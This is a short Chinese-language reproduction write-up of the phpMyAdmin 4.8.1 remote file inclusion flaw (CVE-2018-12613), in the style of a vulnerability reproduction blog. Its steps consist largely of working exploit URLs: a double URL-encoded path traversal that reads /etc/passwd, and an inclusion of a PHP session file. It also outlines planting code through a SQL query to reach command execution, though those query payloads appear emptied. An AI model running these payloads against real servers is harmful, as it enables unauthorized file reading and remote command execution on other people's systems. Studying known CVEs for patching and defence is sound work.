phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

0x01 简介

phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。

0x02 漏洞复现

1.将?进行两次URL编码为"%253f",构造下列payload:

http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

在这里插入图片描述
漏洞存在。

2.在SQL中执行select ‘’;,然后查看当前页面cookie中的phpmyadmin的值。
phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)_第1张图片

3.查看服务器的session文件。
phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)_第2张图片

4.包含session文件。

http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_5160933e2be04f36fccdd4695d6dbef3

phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)_第3张图片
5.构造执行命令的语句。

select '';

phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)_第4张图片
返回命令执行的结果。
phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)_第5张图片

你可能感兴趣的:(漏洞复现)